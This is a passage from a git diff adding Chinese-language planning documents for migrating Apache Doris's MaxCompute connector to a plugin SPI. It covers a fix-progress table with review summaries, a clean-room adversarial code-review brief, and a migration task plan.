✅ DONE (commit 待下方) | +| 2 | FIX-READ-SPLIT | 1 read | blocker | connector | ✅ | ✅ | ✅ | 1 轮→收敛 | ✅ DONE (commit 待下方) | +| 3 | FIX-DDL-ENGINE | 2 DDL | blocker | fe-core | ✅ | ✅ | ✅ | 1 轮→收敛(sound) | ✅ DONE (commit `0d95d837924`) | +| 4 | FIX-DDL-REMOTE | 2 DDL | major | fe-core | ✅ | ✅ | ✅ | 2 轮→收敛 | ✅ DONE (commit `6c68e502662`) | +| 5 | FIX-PART-GATES | 3 part | major | fe-core | ✅ | ✅ | ✅ | 2 轮→收敛 | ✅ DONE (commit `35cfa50f988`) | +| 6 | FIX-WRITE-ROWS | 4 write| major | fe-core | ✅ | ✅ | ✅ | 1 轮→sound | ✅ DONE (commit `b31021696e8`) | + +图例: ⬜ 未开始 / 🔄 进行中 / ✅ 完成 + +## 关键前置决策(动手前) + +- **OQ-6 (FIX-PART-GATES, issue 5)**: ✅ **已定(2026-06-07,用户)= (b) 新增 `PluginDrivenSchemaCacheValue` 子类**持久化 partition_columns(`initSchema()` 填充 + 解析 raw→mapped 列名),mirror legacy 缓存、避热路径远端往返。**另**:scope ✅ **= 一并恢复分区裁剪**(`supportInternalPartitionPruned()=true` + `getNameToPartitionItems()` 经 `listPartitions`/`listPartitionValues` 构 `PartitionItem`)——issue 5 范围扩大,非最小修。 +- **commit 时机**: ✅ 已定(2026-06-07)—— **每 issue 过对抗 review 后即独立 commit**(本地 catalog-spi-05,不 push)。commit message 用 `[P4-T06d] ...`。 + +## 跨 issue 红线(全程守) + +- 🔴 `PartitionsTableValuedFunction.java` 的 `MaxComputeExternalCatalog` 分支(catalog allow-list ~:173)(Batch-D 红线;历史"T06c 已加 PluginDriven 分支"为假)。**FIX-PART-GATES 已新增 PluginDriven 分支**(首次使该前提成真),Batch-D 删 MaxCompute 分支须**排在 FIX-PART-GATES commit 之后**。⚠️**待 doc-sync**: `P4-batchD-maxcompute-removal-design.md:70-77,:102` amendment 措辞"T06c adds"应改"FIX-PART-GATES adds" + decisions-log D-028 登记此 ordering(prior-session WIP 文件,本 issue 不混入 commit,留 doc-sync 处理)。 +- 每 issue 独立 commit;改 fe-core 带 `-pl :fe-core -am`,改连接器带 `-pl :fe-connector-maxcompute`;读真实 BUILD/MVN_EXIT/CS_EXIT(勿信后台 task 通知 exit code)。 +- 测试须真能 fail(Rule 9):验"业务逻辑回退能否让测试变红"。 + +## review 轮次累计结论(防跨轮矛盾,精简索引;详见各 issue round 文件) + +- **FIX-READ-SPLIT (1 轮收敛)**: `MaxComputeScanPlanProvider:272` byte_size 分支 `.length(splitByteSize)`→`.length(-1L)`,恢复 BE BYTE_SIZE/ROW_OFFSET sentinel(否则默认 split 策略静默读错数据)。provider-level UT mutation 自证。2 reviewer CLEAN:legacy parity 精确;3 个 getLength 消费者(含 FileSplit.length→FederationBackendPolicy/FileQueryScanNode)均 benign 且更贴 legacy。⚠️登记本批外: PluginDrivenScanNode 未 override isBatchMode(分区表不走 batch split,READ-P3 同族)。 +- **FIX-READ-DESC (3 轮收敛)**: 生产修复(MaxComputeConnectorMetadata.buildTableDescriptor override + ctor 透传 endpoint/quota/properties;getMetadata passthrough)R1 正确性/BE-parity + R3 回归/build 两维 CLEAN。R1 R2 抓 [medium]=fe-core 调用点 wiring 无测试守门+doc 过度声明 → R2 补 `PluginDrivenExternalTableEngineTest#testToThriftPassesRemoteNamesAndNumColsToBuildTableDescriptor`(mutation 自证)→ R3 独立验证 CLEAN。结论基线: project/table 用 remote 名(OQ-7 有意修正);deprecated TMCTable 字段不 set(同 legacy,空串非 UB);连接器测试须 `-am`。 +- **FIX-WRITE-ROWS (1 轮 sound)**: `PluginDrivenInsertExecutor.doBeforeCommit()` 在 finishInsert guard 后加 `if (connectorTx != null) { loadedRows = connectorTx.getUpdateCnt(); }`,回填翻闸丢失的 INSERT affected-rows(镜像 legacy `MCInsertExecutor:76`)。两分支互斥(`connectorTx != null` ⇔ `insertHandle == null`);取现有 `connectorTx` 字段(无 manager lookup);事务提交仍经 txn manager(onComplete),doBeforeCommit 只补行数;jdbc/es/trino(connectorTx==null)字节不变。推翻 `P4-T05-T06-cutover-design.md:114` "doBeforeCommit 跳过正确" 误判。对抗 review 1 轮 `sound`(4 raw findings Phase B 全证伪)。mutation: `loadedRows=0L`→test1 红、删守卫→test2 红(NPE)。UT 6/6、CS=0。详见 `plan-doc/reviews/P4-T06d-FIX-WRITE-ROWS-review-rounds.md`。 +- **FIX-PART-GATES (2 轮收敛)**: 新 `PluginDrivenSchemaCacheValue` + `PluginDrivenExternalTable` 4 分区 override + initSchema 填分区列 + `PartitionsTableValuedFunction` 3 网关。**决策①**(Rule 7): `supportInternalPartitionPruned()` = `!getPartitionColumns().isEmpty()`(非 legacy MC 无条件 true,因 override 被 4 SPI 类型共享)。**决策②**: TVF SEAM-3 守卫 keyed on `isPartitionedTable()`(分区列空)非 legacy 的分区实例空——空分区表返 0 行非抛,与 SHOW PARTITIONS 一致(登记 minor 偏差)。`getNameToPartitionItems` per-call `listPartitions`(无二级 cache)= CACHE-P1 既定。**Round 1**(needs-revision,4 findings 全 test-quality,production CLEAN): TVF 测试 SEAM-2 vacuous(stub 了 allow-list 强制方法)+ 正向用例 null 解析可 vacuous 通过 → 修 test-only(`DatabaseIf` 用 `CALLS_REAL_METHODS` 跑真 allow-list + 正向加 `verify(isPartitionedTable)`)。**Round 2** converged。mutation: round-1 4 红 + round-2 双红×2。UT 38/38、CS=0。⚠️登记: jdbc/es/trino 共享 override(决策① 规避其行为变更);`PluginDrivenSchemaCacheValue` 无条件 cast 安全(runtime cache、FE 重启重建)。详见 `plan-doc/reviews/P4-T06d-FIX-PART-GATES-review-rounds.md`。 +- **FIX-DDL-REMOTE (2 轮收敛)**: `PluginDrivenExternalCatalog.java` createTable/dropTable 两 override 加 FE 端 local→remote 名解析,mirror legacy `MaxComputeMetadataOps` + base `ExternalCatalog.dropTable`。**Rule-7 决策**: dropTable db==null **无条件抛**(精确 mirror base :1119-1129,推翻 parent 设计文本的 "ifExists-gate")。CREATE 不解析远端表名(legacy parity,non-goal);editlog/cache 用本地名(follower-replay)。**Round 1**(needs-revision,3 findings 全 test-quality,production CLEAN): 测试只锁 REMOTE 名半边,未锁 editlog/`getDbForReplay` 的 LOCAL 名半边 → 修(test-only):`ArgumentCaptor` 断言 `persist.CreateTableInfo`/`DropInfo` 携本地名 + `lastGetDbForReplayArg` 断言 + drop happy-path 分离 resolution/replay db。**Round 2** converged。mutation 总账: round-1(remote 解析 + db-null 无条件抛)5 红 + round-2(editlog/getDbForReplay LOCAL 名)2 红;UT 17/17、CS=0。⚠️登记(非本批修): createTable/dropTable 由 4 SPI_READY_TYPES 共享,jdbc/es/trino DROP 新增 `getTableNullable` 远端往返但 end-state 仍 throw 不回归;"逐字节一致" 仅对 SDK 名成立、未开映射的 FE 控制流仍变(异常层级/往返)。详见 `plan-doc/reviews/P4-T06d-FIX-DDL-REMOTE-review-rounds.md`。 +- **FIX-DDL-ENGINE (1 轮收敛,sound)**: `CreateTableInfo.java` `paddingEngineName`/`checkEngineWithCatalog` 各加 `PluginDrivenExternalCatalog` 分支 + helper `pluginCatalogTypeToEngine`(`max_compute`→`ENGINE_MAXCOMPUTE`,**其余返 null**)。5 项 parent critic 更正全折入(import 位/删错误 SHOW-CREATE 断言/按名注册 CatalogMgr/CTAS 覆盖/Rule-9 拒测)。**精炼(Rule 7)**: helper 返 null 而非 parent 的 default-throw,使 jdbc/es/trino 在**两网关**均 legacy parity(parent 的 throw 会令 checkEngineWithCatalog 新拒 jdbc 显式 ENGINE)。UT `CreateTableInfoEngineCatalogTest` 5 例,mutation(helper `max_compute` 返 null)令 test1/2/3 红自证;CS=0。4 reviewer clean-room→verify→cross-check:6 raw→1 confirmed=nit(`correctExplicitEnginePasses` 对新分支 vacuous,但兄弟 `wrongExplicitEngineRejected` 已 pre-fix-red 守门,acceptable-as-is),code↔design 零矛盾。⚠️Batch-D 顺序: 本 fix 先落,Batch-D 仅删 legacy MC `instanceof`+import(已在设计 §Batch-D / 待写 decisions-log 登记)。 diff --git a/plan-doc/tasks/P4-cutover-adversarial-review.md b/plan-doc/tasks/P4-cutover-adversarial-review.md new file mode 100644 index 00000000000000..57da67416443a4 --- /dev/null +++ b/plan-doc/tasks/P4-cutover-adversarial-review.md @@ -0,0 +1,108 @@ +# P4 — MaxCompute 翻闸实现 · 对抗 Review(clean-room) + +> **状态:待执行(下一 session)** · 方式:**多 agent 对抗 workflow** · 纪律:**clean-room 后交叉核对** +> 这是一份**中性 brief**:只给任务、路径与导航锚点,**不含**开发过程的任何结论/取舍/"已知没问题"的说法。这样设计是为了让本轮 review 不被历史记忆带偏。 + +--- + +## 0. 目的 + +MaxCompute 的功能现在通过 **connector SPI + `PluginDrivenExternalCatalog` 适配层**(以下称"翻闸实现")提供;翻闸前的 **legacy MaxCompute 实现仍完整存在于代码树中**(尚未删除)。 +本轮目标:**重新、独立地审阅翻闸实现的全部功能流程**,从**设计**与**实现交付**两个角度找问题,并**逐一对照 legacy 逻辑**找差异(有意 or 意外)。 + +审阅对象是**当前整条路径的真实代码**(不是某一次提交的 diff)。请把每条路径当作第一次看待。 + +--- + +## 1. ⚠️ Clean-room 纪律(必须遵守 —— 本轮的核心约束) + +1. **先 code,后文档**。每条路径,先只读代码(翻闸实现 + legacy),**独立**形成你自己的判断与发现,**之后**才允许打开 `decisions-log.md` / `deviations-log.md` / `HANDOFF.md` 历史结论做交叉核对。 +2. **派发 review agent 时,prompt 里只放本 brief + 代码访问**;**不要**把 decisions-log / deviations-log / HANDOFF 的结论粘进 agent 的 prompt。历史结论只在最后的"交叉核对"阶段、由独立的核对 agent 读取。 +3. **历史结论一律视为"待证伪的主张",不是事实**。凡是看起来"像是有意为之 / 早有定论"的地方,正是要重点质疑的地方(历史记忆最容易在此制造盲区)。 +4. **不预设结论**。不要假设"翻闸已通过 gate 所以大概率没问题"。gate(编译/checkstyle/单测)只覆盖很窄的面;本轮要找的是 gate 覆盖不到的设计/语义/一致性问题。 +5. 发现项必须有**证据**(`file:line`,翻闸侧 + legacy 侧各一),不接受"凭印象"。 + +--- + +## 2. 方式:多 agent 对抗 workflow + +建议(下一 session 可按需调整规模): + +- **Phase A — 独立审阅(per-path 并行)**:每条路径(5 条)派 1+ 个 reviewer agent,各自端到端 trace 翻闸实现 + legacy,产出该路径的发现清单(结构见 §5)。reviewer 之间互不可见彼此结果。 +- **Phase B — 对抗验证(per-finding)**:对每个发现派**独立的、带不同视角的**验证 agent(例如:correctness / parity-vs-legacy / repro / 边界),**默认立场是"证伪该发现"**;多票后才保留(survives)。目的是滤掉"看似有理实则站不住"的发现。 +- **Phase C — 交叉核对(clean-room 解除)**:只有到这一步,才读 `decisions-log.md` / `deviations-log.md` / `HANDOFF.md`,逐条对比: + - 我们独立发现的问题,历史文档是否已记录?(若未记录 = 新发现) + - 历史文档**声称**已解决/无问题/可接受的点,本轮独立审阅是否**同意**?(若不同意 = 重点分歧,优先级最高) + - 任何"声称做了 X"但代码里查无实据的,标为 divergence。 +- **Phase D — 综合**:产出最终报告(§5),按严重度排序,标注每项的"是否回归 / 是否新发现 / 与历史结论是否分歧"。 + +> 规模建议:ultracode 已开,token 不是约束。优先把对抗验证(Phase B)做足——这是"对抗 review"的价值所在。 + +--- + +## 3. 审阅的 5 条路径 + 导航锚点 + +> 下列锚点仅为**导航起点**(代码树中客观存在的类/模块),**不含**对其正确与否的任何判断。请从这些起点 trace 出完整路径,并用自己的 grep/Explore 扩展地图——不要假设这里列全了。 +> 通用结构:每条路径都有 **翻闸侧**(connector SPI + `PluginDriven*` 适配)与 **legacy 侧**(`org.apache.doris.datasource.maxcompute.*`),请**两侧都读并对照**。connector 实现主要在 `fe/fe-connector/fe-connector-maxcompute/` 与 SPI 接口 `fe/fe-connector/fe-connector-api/`。 + +### 路径 1 — 读取(SELECT / 分区裁剪 / schema / split / 类型映射 / 投影下推) +- 翻闸:`PluginDrivenScanNode`、`PluginDrivenExternalTable`(`datasource/`)、connector 的 scan/split/schema 实现(`fe-connector-maxcompute`)。 +- legacy:`datasource/maxcompute/source/MaxComputeScanNode`、`datasource/maxcompute/MaxComputeExternalTable`。 +- BE 侧(如涉及):`fe/be-java-extensions/max-compute-connector/`。 + +### 路径 2 — 写入(INSERT / INSERT OVERWRITE / OVERWRITE PARTITION / 事务 / commit 协议 / block 分配) +- 翻闸:`nereids/.../insert/PluginDrivenInsertExecutor`、`planner/PluginDrivenTableSink`、`transaction/PluginDrivenTransactionManager`、connector 的 write/commit 实现;BE→FE block 分配 RPC `service/FrontendServiceImpl#getMaxComputeBlockIdRange`、commit 数据结构 `TMCCommitData`;BE 客户端 `be-java-extensions/max-compute-connector/.../MaxComputeFeClient`。 +- legacy:`nereids/.../insert/MCInsertExecutor` 及其牵出的 legacy 写/事务路径。 + +### 路径 3 — DDL(CREATE/DROP TABLE、CREATE/DROP DATABASE、RENAME、IF [NOT] EXISTS / FORCE 语义) +- 翻闸:`datasource/PluginDrivenExternalCatalog`(create/drop table/db override)、SPI `connector/api/ConnectorSchemaOps`+`ConnectorTableOps`、`fe-connector-maxcompute/.../MaxComputeConnectorMetadata`、`fe-connector-maxcompute/.../McStructureHelper`。 +- legacy:`datasource/maxcompute/MaxComputeExternalCatalog`、`datasource/maxcompute/MaxComputeMetadataOps`、`datasource/maxcompute/McStructureHelper`、基类 `datasource/ExternalCatalog`(create/drop 的 metadataOps 路径)。 + +### 路径 4 — 元数据回放(editlog → replay,master vs follower 状态重建) +- 翻闸:`datasource/ExternalCatalog#replay{CreateDb,DropDb,CreateTable,DropTable}`(注意 `metadataOps` 在翻闸路径上的取值)、`persist/EditLog` 的相关 OP 分发、`catalog/Env#replay{CreateDb,DropDb,CreateTable,DropTable}`。 +- legacy:同上 replay 入口,但经 `MaxComputeMetadataOps` 的 `afterCreateDb/afterDropDb/afterCreateTable/afterDropTable`。 +- 重点:**master 写路径**与 **follower 回放路径**分别如何把内存态改到与远端一致;两侧是否对称。 + +### 路径 5 — 元数据 cache(db/table 名单、schema、分区;失效时机与一致性) +- 翻闸:`datasource/ExternalCatalog`(`resetMetaCacheNames`/`unregisterDatabase`/`getDbForReplay`)、`datasource/ExternalDatabase`(`resetMetaCacheNames`/`unregisterTable`)、`datasource/ExternalMetaCacheMgr`、`PluginDrivenExternalTable` 的 schema/分区获取、connector 的分区列举(是否有/无连接器侧 cache)。 +- legacy:`MaxComputeMetadataOps.afterX` 的失效动作、`datasource/maxcompute/MaxComputeExternalMetaCache`、legacy 分区/ schema 获取。 +- 重点:DDL 后**同一 FE** 是否立即可见;**follower** 回放后是否一致;TTL/refresh;有无陈旧读窗口。 + +--- + +## 4. 每条路径的审阅维度(中性 checklist) + +- **D1 正确性**:逻辑是否正确实现预期行为?参数、顺序、缺步、错误分支。 +- **D2 与 legacy 的行为一致性**:trace legacy 同一操作,翻闸是否保持**可观察行为**一致?任何差异——是有意(且应有据)还是意外(=回归)? +- **D3 完整性**:翻闸是否覆盖 legacy 的全部能力?有无遗漏的操作 / 被丢弃的语义(如 `ifExists`/`force`/`ifNotExists`)/ 未处理的分支? +- **D4 边界与错误处理**:null、异常、空结果、大小写、**本地名 vs 远端名映射**、并发、超时、重试。 +- **D5 一致性 / 持久化**(尤其路径 4/5):master vs follower、editlog/replay 正确性、cache 失效时机、陈旧读、HA 下的可恢复性。 +- **D6 设计 vs 实现**:实现是否与其设计文档一致?(设计文档在 `plan-doc/tasks/designs/`,**仅在 Phase C 交叉核对时读**)有无未声明的偏离? + +--- + +## 5. 产出(deliverable) + +输出到 `plan-doc/reviews/P4-cutover-review-findings.md`(新建;如无 `reviews/` 目录则建)。结构: + +- **逐路径小节**(读取/写入/ddl/回放/cache),每节列发现项: + | 字段 | 说明 | + |---|---| + | id | 如 `READ-01` | + | severity | blocker / major / minor / question | + | title | 一句话 | + | evidence | 翻闸侧 `file:line` + legacy 侧 `file:line` | + | legacy-diff | 与 legacy 的具体行为差异 | + | regression? | 是/否/不确定 | + | adversarial-verdict | Phase B 的存活情况(几票证伪/几票确认) | + | recommendation | 修 / 接受 / 待定 + 理由 | +- **交叉核对小节(Phase C)**:本轮发现 vs `decisions-log` / `deviations-log` / `HANDOFF`——分三类:① 历史未记的新发现;② 历史声称已解决但本轮**不认同**的分歧(最高优先级);③ 声称做了但查无实据。 +- **总结**:按 severity 排序的 top 问题 + 建议的后续动作。 + +--- + +## 6. 边界 + +- 本轮是**审阅**,**不改代码**(除非另行授权)。发现 → 报告 → 由用户决定修复时机。 +- legacy 代码当前仍在树中(Batch D 删除尚未执行),这正是做对照 review 的**最佳时机**——务必两侧对照,别只看翻闸侧。 +- 若需要运行期佐证,可参考(但不取代代码审阅)live 验证 runbook(见 `HANDOFF.md`)。 diff --git a/plan-doc/tasks/P4-maxcompute-migration.md b/plan-doc/tasks/P4-maxcompute-migration.md new file mode 100644 index 00000000000000..905e55523c0f42 --- /dev/null +++ b/plan-doc/tasks/P4-maxcompute-migration.md @@ -0,0 +1,140 @@ +# P4 — maxcompute 迁移(首个 full adopter + 翻闸) + +> 设计 + 批次计划(**待用户批准**)。批准后按批次独立落地、独立 commit。 +> 维护规则见 [README §4](../README.md);协作规范见 [AGENT-PLAYBOOK.md](../AGENT-PLAYBOOK.md)。 +> 事实底座:[research/p4-maxcompute-migration-recon.md](../research/p4-maxcompute-migration-recon.md)(2026-06-06,注:recon §1/§3 计数 **早于 W-phase**,本文已据当前代码 re-grep 校正)。 + +--- + +## 元信息 + +- **状态**:🚧 进行中(**设计已批准 [D-023]**;A+B ✅ + **C 翻闸已落但功能未完整**(T05 image-compat + T06a 写接线 + **T06b flip ✅**;但 **DROP TABLE/CREATE DB/DROP DB/SHOW PARTITIONS/partitions TVF 的 FE 分发未接 SPI** —— 代码核实,详见 HANDOFF「⚠️ 关键发现」);**下一 = P4-T06c 补 FE 分发接线([D-028])→ live 验证全绿 → Batch D**(清引用+删 legacy+drop odps 依赖)) +- **启动日期**:2026-06-06(设计批准) +- **目标完成**:分批,每批一 session(估 5 批 / 11 task) +- **阻塞(前置)**:W-phase(W1–W7)✅ 已完成 —— 共享写接线 seam(W4 事务桥 + W5 opaque-sink)就位 +- **阻塞下游**:P5 paimon(复用写 SPI)/ P6 iceberg / P7 hive 的 full-adopter 模式以本阶段为样板 +- **主 owner**:@me + +--- + +## 阶段目标 + +把 `max_compute` 连接器从 fe-core legacy(`datasource/maxcompute/`)完整迁移到插件 SPI,并**翻闸**(`SPI_READY_TYPES += "max_compute"`),删除 legacy。这是**首个 full 迁移 + cutover**(vs P2 trino 只读 + P3 hudi hybrid-gate-closed)。 + +**为何是 full(非 P3 式 hybrid)**:scope 在 W-phase 已定(recon §9 fork → 用户选 **C→A**:先建共享写 SPI = W-phase[D-021],再 full P4)。W-phase 已把写路径 keystone(recon §0/§4 标注的最大风险)解耦,full P4 现可行。 + +**对齐**:master plan §3.5;写-RFC [§12「P4 maxcompute」](./designs/connector-write-spi-rfc.md)。 + +--- + +## 关键事实(本设计 session code-grounded 核读 / re-grep,2026-06-06) + +1. **连接器模块** `fe/fe-connector/fe-connector-maxcompute/`(pkg `org.apache.doris.connector.maxcompute`,13 文件):读/元数据/scan ✅;**写 SPI 全缺**(无 `getWritePlanProvider` / `beginTransaction` / `ConnectorWriteOps` / `ConnectorTransaction`);**DDL 缺**(仅 `McStructureHelper` 低层 `createTableCreator`/`dropTable`,无 SPI 层 `ConnectorTableOps.createTable`);**分区 listing 缺**。 +2. **legacy** `fe-core/.../datasource/maxcompute/` = 10 文件 / **3004 LOC**(含 `MCTransaction` 262、`MaxComputeMetadataOps` 565、`MaxComputeScanNode` 809、`MaxComputeExternalCatalog/Database/Table`、MetaCache/SchemaCacheValue、fe-core `McStructureHelper` 副本 298)。连接器**已有**读侧等价(metadata/scan-provider/client-factory/structure-helper/type-mapping/predicate-converter)→ legacy 在 cutover **删除**(非搬运);只有 **DDL + 写/事务 + 分区** 三块功能需先**港入**连接器。 +3. **`MCTransaction` 公开面**(待港):`addCommitData(byte[])`✅(W2 已加) · `supportsWriteBlockAllocation`✅ · `allocateWriteBlockRange`✅ · `beginInsert(ExternalTable, Optional)` · `getWriteSessionId` · `finishInsert` · `commit` · `rollback` · `getUpdateCnt` · `updateMCCommitData(List)`(legacy typed)。 +4. **`TMaxComputeTableSink`**(`gensrc/thrift/DataSinks.thrift:586`,18 字段)已定义:`session_id`/`write_session_id`(15)/`block_id_start`(8)/`block_id_count`(9)/`static_partition_spec`(10)/`partition_columns`(14)/`txn_id`(18)/`properties`(16) —— W5 留的 write-context seam 字段齐备。 +5. **反向引用 re-grep(post-W-phase)= ~19 站点**(recon §3 旧称 ~36,差额=W-phase 灭 3 热点 txn 站 + recon 多算注册站;**穷举留 Batch D 入口门**): + - **W-phase 已灭**(grep 证):`Coordinator` / `LoadProcessor` / `FrontendServiceImpl` **零** `MCTransaction`。 + - **live(少数,建 MC 专有对象)**:`PhysicalPlanTranslator:795`(建 MaxComputeScanNode) · `ShowPartitionsCommand:415` · `CreateTableInfo:912` · `BindSink:1084` · `PartitionsTableValuedFunction:200`(getOdpsTable().getPartitions) · `MetadataGenerator:1310` · `MCInsertExecutor:64/75`(cast MCTransaction)。 + - **mechanical(折进 PluginDriven/SPI 分支)**:`CatalogFactory:146` · `ExternalCatalog:938`(db) · `ExternalMetaCacheRouteResolver:75` · `ShowPartitionsCommand:203` · `InsertOverwriteTableCommand:320` · `CreateTableInfo:390` · `UnboundTableSinkCreator:66/105/146` · `PartitionsTableValuedFunction:173` · `PartitionValuesTableValuedFunction:115` + recon §3 注册站(GsonUtils×3 / ExternalMetaCacheMgr:183/310 / TableIf enum / InitCatalogLog:41 / DatasourcePrintableMap / BindRelation:540 / Alter:617)。 + +--- + +## 验收标准 + +- [ ] MC **读**路径翻闸后经 SPI(`PluginDrivenScanNode`)行为不变(golden / 手测)。 +- [ ] MC **写**(INSERT / INSERT OVERWRITE)翻闸后经 W4 事务桥 + W5 opaque-sink;commit 载荷 `TBinaryProtocol` 等价(`CommitDataSerializer` 红线);block-id 分配正确。 +- [ ] MC **DDL**(CREATE/DROP TABLE+DB)翻闸后经 SPI `ConnectorTableOps`。**(⚠️ 翻闸只接通 CREATE TABLE;DROP TABLE/CREATE DB/DROP DB 未接,归 P4-T06c [D-028])** +- [ ] **SHOW PARTITIONS** / `partitions` TVF 翻闸后经 SPI `listPartitions*`。**(⚠️ 仍 legacy instanceof 分发,未接,归 P4-T06c [D-028])** `partition_values` TVF:OQ-5 待确认 legacy MC 是否支持(HMS-only,很可能既有限制非回归)。 +- [x] `max_compute` 进 `SPI_READY_TYPES`;`CatalogFactory` case 删;**GSON image 兼容**(旧 image 可加载,registerCompatibleSubtype)。**(T06b 翻闸 ✅)** +- [ ] fe-core **零** `instanceof MaxComputeExternal*`、**零** `MCTransaction`(grep 空)。 +- [ ] `datasource/maxcompute/` 整目录删;`McStructureHelper` fe-core 副本删(**收口 P1-T02**)。 +- [ ] 连接器单测绿(JUnit5 手写替身,无 mockito);checkstyle 0;import-gate 绿。 +- [ ] **R-004**:ODPS SDK 在插件 classloader 下连通(翻闸前防御测)。 + +--- + +## 任务清单 + +> ID 永不复用。状态:⏳ pending / 🚧 / ✅ / ❌ / 🚫deleted。**逐批独立 commit**。 + +| ID | 任务 | 批次 | 状态 | 备注 | +|---|---|---|---|---| +| P4-T01 | 连接器 **DDL**:impl `ConnectorTableOps` create/drop table+db(港 `MaxComputeMetadataOps` create/drop/truncate `Impl`,**消费 P0 `ConnectorCreateTableRequest`** 而非 fe-core `CreateTableInfo`)| **A** gate 关 | ✅ | `MaxComputeConnectorMetadata` impl createTable/dropTable/createDatabase/dropDatabase + `MCTypeMapping.toMcType` 反向类型映射;连接器 `McStructureHelper` 原语已具备。**含修 fe-core 转换器 CHAR/VARCHAR 长度 [DV-010]**。守门全绿(compile + checkstyle 0 + import-gate + `ConnectorColumnConverterTest` 9/0F0E)| +| P4-T02 | 连接器 **分区**:impl `listPartitions/listPartitionNames/listPartitionValues`(港 ODPS `getPartitions`,直取无自有 cache)| **A** gate 关 | ✅ | `MaxComputeConnectorMetadata` impl 三方法:names→`PartitionSpec.toString(false,true)`(镜像 legacy catalog:283/table:201);`listPartitions` filter 忽略返全量(values 由 `keys()`/`get(k)`,props=emptyMap);`listPartitionValues` 按入参列序 `spec.get(col)`。**OQ-4 定:不建自有 cache,直取 ODPS**。守门全绿(compile + checkstyle 0 + import-gate)| +| P4-T03 | 连接器 **写/事务 SPI**:`ConnectorWriteOps.beginTransaction` + `ConnectorTransaction`(港 `MCTransaction`:`addCommitData` 反序列化 `TMCCommitData`、block 分配、commit/rollback、getUpdateCnt)| **B** gate 关 | ✅ | 新建 `MaxComputeConnectorTransaction` + `beginTransaction`,over W4 委派;txn id 经新增 `ConnectorSession.allocateTransactionId()`([D-024] fork1);写 session 创建挪 T04([D-024] fork2);block 上限常量化 + 异常 `DorisConnectorException`([DV-011]);`TBinaryProtocol` 红线守。守门全绿(fe-connector-maxcompute+api+fe-core compile + checkstyle 0 + import-gate 0)。设计 [P4-T03 doc](./designs/P4-T03-write-txn-design.md)| +| P4-T04 | 连接器 **写计划**:`Connector.getWritePlanProvider` → `planWrite` 产 `TMaxComputeTableSink`(填 W5 write-context seam:txn_id/write_session_id/static_partition_spec;港 legacy `MaxComputeTableSink` config-read)| **B** gate 关 | ✅ | 新建 `MaxComputeWritePlanProvider.planWrite`(**OQ-2 = Approach A**:finalizeSink 一处建 ODPS 写 session + `setWriteSession` 绑 txn + 盖 `txn_id`/`write_session_id`,无运行期注入);`MaxComputeDorisConnector.getSettings()`(D-3 抽出,scan/write 共用,镜像 legacy 单 settings)+ `getWritePlanProvider()`;`supportsInsert()`=true(D-4,beginInsert/finishInsert 留 throwing-default 待 Batch C);**fe-core seam(D-2a)**:`PluginDrivenTableSink.bindViaWritePlanProvider(insertCtx)` 读 overwrite+静态分区填 handle + `PluginDrivenInsertCommandContext.staticPartitionSpec`(非基类,避 `MCInsertCommandContext` shadow)。`block_id` 不盖(运行期 T03);`partition_columns` 取 ODPS 表列(**DV-012**)。**5 决策签字 [D-025]**。守门全绿(compile BUILD SUCCESS + checkstyle 0 + import-gate 0,真实 EXIT)。单测延 P4-T10 | +| P4-T05 | **翻闸接线**:GsonUtils `registerCompatibleSubtype`(catalog :397 / **db :452** / table :472 → PluginDriven)+ `PluginDrivenExternalTable.getEngine`/`getEngineTableTypeName` 加 `case "max_compute"` + `legacyLogTypeToCatalogType`(MAX_COMPUTE→lowercase,无连字符特例)| **C** | ✅ | **实现 gate-green(待 commit)**:三 GSON 注册齐迁 compat(**db :452 折入**——漏迁则翻闸后 `MaxComputeExternalDatabase.buildTableInternal:44` cast 抛 ClassCastException)+ 删 3 unused import + 引擎名 case(getEngine=null / getEngineTableTypeName=MAX_COMPUTE_EXTERNAL_TABLE,镜像 legacy)+ `legacyLogTypeToCatalogType` 注释(默认分支已出 "max_compute",不加 case)。UT `PluginDrivenExternalTableEngineTest` +2 max_compute 例 9/9。gate:compile/checkstyle 0/import-gate 0(真实 EXIT)。4-agent 复核 2 告警判非问题(getMetaCacheEngine 假阳 / getMysqlType 同 ES)。保留 `TableIf.MAX_COMPUTE_EXTERNAL_TABLE`/`InitCatalogLog.MAX_COMPUTE` 作 image 兼容。[D-026 §3.4] | +| P4-T06 | **翻闸**:`CatalogFactory.SPI_READY_TYPES += "max_compute"` + 删 `CatalogFactory` case(:146)+ **插件 harness ODPS 连通性防御测(R-004)** | **C** **live cutover** | ✅ | **T06a 写接线 W-a..d+静态分区/overwrite 绑定(G1–G5)+R-004 隔离测+UT** 已 commit;**T06b flip 落地**(SPI_READY_TYPES += "max_compute" + 删 case + import + 注释;gate 全绿 [D-027])。2 SPI 新增登记 §20 E11。**R-004 part-2 live 用户跑、过方算翻闸完成** | +| P4-T06c | **补 FE 分发接线(翻闸完整化,[D-028])**:把 DDL(createDb/dropDb/dropTable)+ SHOW PARTITIONS + partitions TVF 的 FE 分发接到**已有**连接器 SPI(连接器侧 P4-T01/T02 已实现,FE 零调用方)。**通用实现**(keyed on `PluginDrivenExternalCatalog`/`PLUGIN_EXTERNAL_TABLE`,非 MC 专有)| **C** **翻闸完整化** | ⏳ | DDL:`PluginDrivenExternalCatalog` override 3 方法→`connector.getMetadata().{createDatabase/dropDatabase/dropTable}`+editlog(镜像 `createTable:257`)。SHOW PARTITIONS:`ShowPartitionsCommand:202-207/255/286` 加 PluginDriven 分支→`listPartitionNames`。partitions TVF:`MetadataGenerator:1308/1337` 加 PluginDriven 分支。**先 rewire → Batch D 只删残留 legacy MC 分支**(解 §2 删-vs-rewire 冲突)。完成门 = fe-core gate + UT + **用户 live 全绿**。RENAME(连接器未 port,次要)/partition_values(OQ-5) 不在范围 | +| P4-T07 | 清 **mechanical** 反向引用(折进既有 PluginDriven/SPI 分支)| **D** | ⏳ | **闭包已 verify**([Batch D 移除设计](./designs/P4-batchD-maxcompute-removal-design.md),84 ref / OQ-3 穷举 re-grep 满足);执行**待 live 验证后** | +| P4-T08 | 清 **live** 反向引用(`PhysicalPlanTranslator:795` / `ShowPartitionsCommand:415` / `CreateTableInfo:912` / `BindSink:1084` / `PartitionsTableValuedFunction:200` / `MetadataGenerator:1310`)+ **验 `MCInsertExecutor` 成死代码** | **D** | ⏳ | OQ-1 已 verify(仅 dead `instanceof` 门建,grep-empty 步确认);执行待 live 验证 | +| P4-T09 | **删 legacy**(21 文件):`datasource/maxcompute/`(10)+ 写/txn 